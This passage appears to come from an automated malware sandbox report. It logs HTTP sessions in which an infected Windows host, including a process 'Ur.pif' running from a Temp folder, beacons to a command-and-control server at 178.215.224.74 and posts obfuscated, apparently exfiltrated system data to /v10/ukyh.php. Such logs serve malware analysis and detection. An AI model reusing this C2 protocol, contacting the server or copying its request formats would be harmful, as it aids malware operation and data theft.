                                        Data Raw: 6a 73 70 6f 3d 34 33 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 74 4d 44 35 5a 51 46 31 4c 52 6c 6c 49 58 54 6f 73 4e 6a 51 73 4d 7a 49 78 4a 6a 38 33 57 55 42 66 4d 54 41 75 4d 44 45 33 4d 6a 67 79 57 30 42 64 51 54 68 63 56 58 46 6c 63 6e 4e 65 61 6d 64 75 5a 33 46 63 51 58 4a 77 52 6d 4e 32 59 56 35 4f 62 57 4e 68 62 46 35 63 5a 32 31 77 56 44 4d 78 4d 54 6b 7a 4f 6c 35 58 63 43 78 77 61 32 35 54 51 6c 39 44 4f 46 78 56 63 32 56 79 63 31 35 69 62 57 35 6c 63 31 35 44 63 48 42 47 59 58 52 68 58 6b 78 6e 59 32 4e 75 58 46 52 6e 62 58 4a 65 4d 7a 4d 37 4f 7a 4d 34 58 46 56 77 4a 6e 4a 70 5a 67 25 33 44 25 33 44
                                        Data Ascii: jspo=43&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAtMD5ZQF1LRllIXTosNjQsMzIxJj83WUBfMTAuMDE3MjgyW0BdQThcVXFlcnNeamduZ3FcQXJwRmN2YV5ObWNhbF5cZ21wVDMxMTkzOl5XcCxwa25TQl9DOFxVc2Vyc15ibW5lc15DcHBGYXRhXkxnY2NuXFRnbXJeMzM7OzM4XFVwJnJpZg%3D%3D
                                        Nov 21, 2024 20:01:01.533435106 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:01 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        24192.168.2.449945178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:01.734539032 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:03.043689966 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:02 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        25192.168.2.449951178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:04.090903997 CET134OUTGET /v10/ukyh.php?jspo=33&jwvs=9A5605DE11447A0E2031624EE8FBDE HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:05.378820896 CET240INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:05 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 40
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 4d 53 70 53 5a 33 35 6e 62 6e 56 74 52 6d 64 2b 61 57 46 6e 63 53 78 6e 65 6d 56 43 53 47 35 6a 62 6e 4e 6e 51 44 45 3d
                                        Data Ascii: MSpSZ35nbnVtRmd+aWFncSxnemVCSG5jbnNnQDE=


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        26192.168.2.449955178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:05.948683977 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:07.275743961 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:07 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        27192.168.2.449961178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:08.090935946 CET140OUTGET /v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:09.340446949 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:09 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        28192.168.2.449972178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:12.497273922 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:13.855789900 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:13 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        29192.168.2.449978178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:14.825248003 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:16.134665966 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:15 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 4e 33 78 32 62 57 46 6d
                                        Data Ascii: N3x2bWFm


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        30192.168.2.449984178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:17.637731075 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:18.887870073 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        31192.168.2.449985178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:17.653348923 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:19.021061897 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:18 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        32192.168.2.449986178.215.224.74802476C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:19.232234955 CET821OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 527
                                        Cache-Control: no-cache
                                        Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 4d 54 41 77 4b 44 30 6f 57 30 42 56 4d 7a 49 34 4b 6a 4d 79 4d 6a 4d 7a 4b 44 45 31 4d 43 59 77 4d 7a 55 73 4d 6a 49 30 4c 6a 63 30 57 55 68 66 4d 54 41 7a 4b 44 4d 77 4d 6a 49 31 4b 6c 4a 6e 64 6d 31 75 64 32 64 45 5a 58 52 70 59 57 64 78 4c 6d 64 36 5a 31 74 41 58 54 4d 34 4d 69 6f 78 4f 44 49 7a 4f 53 6f 7a 4e 54 6f 73 4d 44 4d 31 4c 44 6f 36 4e 69 77 33 4e 6c 74 41 58 54 49 71 4d 6a 49 39 4b 45 4d 36 58 46 64 78 5a 58 4a 78 58 47 70 76 62 47 56 37 58 45 4e 79 63 45 52 6a 64 47 4e 65 54 6d 39 68 59 32 35 63 64 47 56 76 65 46 35 53 5a 58 35 6e 62 48 31 6c 52 6d 64 30 61 32 46 6e 63 79 78 74 63 47 64 5a 51 46 38 34 4b 6a 45 77 4d 79 70 42 4d 6c 35 56 63 32 56 77 63 56 78 71 62 57 35 6c 63 31 35 42 65 48 42 47 59 33 52 68 58 6b 78 74 59 57 4e 73 58 6e 5a 6e 62 58 42 63 55 47 31 30 5a 57 35 39 5a 30 5a 74 64 6d 74 68 5a 33 45 73 5a 33 68 6e 55 30 68 66 4d [TRUNCATED]
                                        Data Ascii: jspo=34&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=MTAwKD0oW0BVMzI4KjMyMjMzKDE1MCYwMzUsMjI0Ljc0WUhfMTAzKDMwMjI1KlJndm1ud2dEZXRpYWdxLmd6Z1tAXTM4MioxODIzOSozNTosMDM1LDo6Niw3NltAXTIqMjI9KEM6XFdxZXJxXGpvbGV7XENycERjdGNeTm9hY25cdGVveF5SZX5nbH1lRmd0a2FncyxtcGdZQF84KjEwMypBMl5Vc2VwcVxqbW5lc15BeHBGY3RhXkxtYWNsXnZnbXBcUG10ZW59Z0ZtdmthZ3EsZ3hnU0hfMzAyKjYqW0BdMzgyKjEwMjMxKjM3OC4wMT0uMDA0LjU0WUJfMTIyKDEwMDM7KDE1U0JfOTAyKDMyMjMxKDk%2FOiwyMzUuMjI0LjU8WUBdMTIxKjEyMjAyKFJtdmdsdWVGZXRrYWVxLGd4ZVtCVTMwMCIzMjgxMygzNTosMjM9JjAwNCw3NFtAXQ%3D%3D
                                        Nov 21, 2024 20:01:20.581027031 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        33192.168.2.449987178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:19.299710989 CET93OUTGET /v10/ukyh.php?gi HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:20.629930973 CET211INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:20 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 11
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 38 2e 34 36 2e 31 32 33 2e 37 35
                                        Data Ascii: 8.46.123.75


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        34192.168.2.449998178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:22.481530905 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:23.786011934 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:23 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        35192.168.2.449999178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:23.325367928 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:24.623718977 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:24 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        36192.168.2.450005178.215.224.74802476C:\Users\user\AppData\Local\Temp\139918\Ur.pif
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:25.026915073 CET710OUTPOST /v10/ukyh.php HTTP/1.1
                                        Accept: text/*
                                        Content-Type: application/x-www-form-urlencoded; charset=utf-8
                                        User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
                                        Host: 178.215.224.74
                                        Content-Length: 416
                                        Cache-Control: no-cache
                                        Data Raw: 6a 73 70 6f 3d 39 26 6a 77 76 73 3d 39 41 35 36 30 35 44 45 31 31 34 34 37 41 30 45 32 30 33 31 36 32 34 45 45 38 46 42 44 45 26 6d 65 6c 71 3d 61 6d 39 75 5a 33 74 5a 51 46 31 48 55 53 4a 47 59 57 39 6e 4f 43 49 69 49 69 41 69 4b 43 67 69 49 69 41 69 49 43 41 67 49 43 41 67 49 69 68 50 61 57 4e 79 62 58 46 76 5a 6e 59 67 56 32 6c 73 5a 47 64 33 63 53 49 78 4d 43 4a 51 63 47 31 5a 51 46 38 7a 4d 69 34 77 4d 54 55 34 4d 6a 42 62 53 46 38 79 4f 54 6b 30 4d 54 64 5a 51 6c 39 44 4f 46 52 64 63 57 64 79 63 56 78 71 62 32 35 6c 63 31 35 4a 63 6e 42 45 59 58 5a 6a 58 45 78 74 59 32 46 73 58 6c 52 74 62 58 4a 65 4d 54 4d 37 4f 54 4d 36 58 6c 56 77 4c 48 4a 70 5a 6c 74 43 56 55 45 36 58 46 31 78 5a 33 70 7a 58 6d 68 74 62 47 64 78 58 45 4e 34 65 45 5a 6a 64 47 4e 63 54 47 39 6a 59 57 78 65 58 47 64 74 63 46 77 7a 4d 54 6b 35 4d 7a 68 63 56 58 41 75 65 47 6c 6b 57 55 42 64 4d 7a 41 76 4d 44 52 62 51 6c 39 42 52 46 74 41 58 33 78 77 64 57 56 54 51 6c 39 75 59 57 35 78 5a 31 6c 43 58 7a 67 73 50 44 34 73 4d 7a [TRUNCATED]
                                        Data Ascii: jspo=9&jwvs=9A5605DE11447A0E2031624EE8FBDE&melq=am9uZ3tZQF1HUSJGYW9nOCIiIiAiKCgiIiAiICAgICAgIihPaWNybXFvZnYgV2lsZGd3cSIxMCJQcG1ZQF8zMi4wMTU4MjBbSF8yOTk0MTdZQl9DOFRdcWdycVxqb25lc15JcnBEYXZjXExtY2FsXlRtbXJeMTM7OTM6XlVwLHJpZltCVUE6XF1xZ3pzXmhtbGdxXEN4eEZjdGNcTG9jYWxeXGdtcFwzMTk5MzhcVXAueGlkWUBdMzAvMDRbQl9BRFtAX3xwdWVTQl9uYW5xZ1lCXzgsPD4sMzIxLjc1W0BdWUhfQzpcV3FlcnFcam9sZXtcQ3JwRGN0Y15Qb2Nva25nXEZnbnBoYWxGfW1ycQ%3D%3D
                                        Nov 21, 2024 20:01:26.379108906 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:26 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        37192.168.2.450006178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:25.153795958 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:26.464991093 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:26 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        38192.168.2.450007178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:26.723089933 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:28.027894020 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:27 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        39192.168.2.450013178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:28.553103924 CET140OUTGET /v10/ukyh.php?jspo=3&jwvs=9A5605DE11447A0E2031624EE8FBDE&vprl=2 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:29.914760113 CET199INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:29 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 0
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        40192.168.2.450014178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:29.002254009 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:30.314646006 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:30 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        41192.168.2.450020178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:31.262891054 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:32.523741961 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:32 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        42192.168.2.450031178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:35.181283951 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:36.448208094 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:36 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        43192.168.2.450036178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:37.684751987 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:38.943878889 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:38 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        44192.168.2.450043178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:41.044296980 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:42.287781954 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:42 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        45192.168.2.450047178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:43.497288942 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:44.752422094 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:44 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        46192.168.2.450048178.215.224.25280
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:43.513156891 CET98OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.252
                                        User-Agent: curl/7.83.1
                                        Accept: */*


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        47192.168.2.450049178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:45.402611017 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:46.663364887 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:46 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        48192.168.2.450050178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:46.892848015 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:48.167445898 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:47 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        49192.168.2.450051178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:48.728887081 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:50.022901058 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:49 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        50192.168.2.450052178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:50.245455027 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:51.662812948 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:51 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        51192.168.2.450053178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:52.363153934 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:53.664088964 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:53 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        52192.168.2.450054178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:53.867381096 CET175OUTGET /v10/ukyh.php?jspo=1&jwvs=9A5605DE11447A0E2031624EE8FBDE&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:55.249310017 CET207INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:55 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 8
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 64 6d 39 70 5a 67 3d 3d
                                        Data Ascii: dm9pZg==


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        53192.168.2.450055178.215.224.7480
                                        TimestampBytes transferredDirectionData
                                        Nov 21, 2024 20:01:55.863719940 CET97OUTGET /v10/ukyh.php?jspo=6 HTTP/1.1
                                        Host: 178.215.224.74
                                        User-Agent: curl/7.83.1
                                        Accept: */*
                                        Nov 21, 2024 20:01:57.253498077 CET203INHTTP/1.1 200 OK
                                        Date: Thu, 21 Nov 2024 19:01:57 GMT
                                        Server: Apache/2.4.41 (Ubuntu)
                                        Cache-Control: no-store, no-cache, must-revalidate
                                        Content-Length: 4
                                        Content-Type: text/html; charset=UTF-8
                                        Data Raw: 62 68 6c 6f
                                        Data Ascii: bhlo


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        54192.168.2.450056178.215.224.7480
                                        TimestampBytes transferredDirectionData
